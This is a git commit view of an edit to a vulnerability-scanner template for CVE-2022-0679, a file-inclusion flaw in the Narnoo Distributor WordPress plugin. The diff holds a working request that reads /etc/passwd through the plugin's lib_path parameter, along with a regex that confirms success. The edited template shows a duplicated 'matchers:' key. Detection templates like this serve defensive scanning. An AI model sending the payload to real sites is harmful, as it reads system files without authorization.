Update CVE-2022-0679.yaml

patch-1
Veshraj Ghimire 2022-10-03 17:01:49 +05:45 committed by GitHub
parent fe03d7fb84
commit 640baf835b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 4 deletions

View File

@ -1,4 +1,5 @@
id: CVE-2022-0679
info:
name: Narnoo Distributor <= 2.5.1 - Unauthenticated LFI to Arbitrary File Read / RCE
author: Veshraj
@ -19,15 +20,13 @@ requests:
X-Requested-With: XMLHttpRequest
Content-Length: 396
Connection: close
action=narnoo_distributor_lib_request&lib_path=/etc/passwd
matchers-condition: and
matchers:
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status: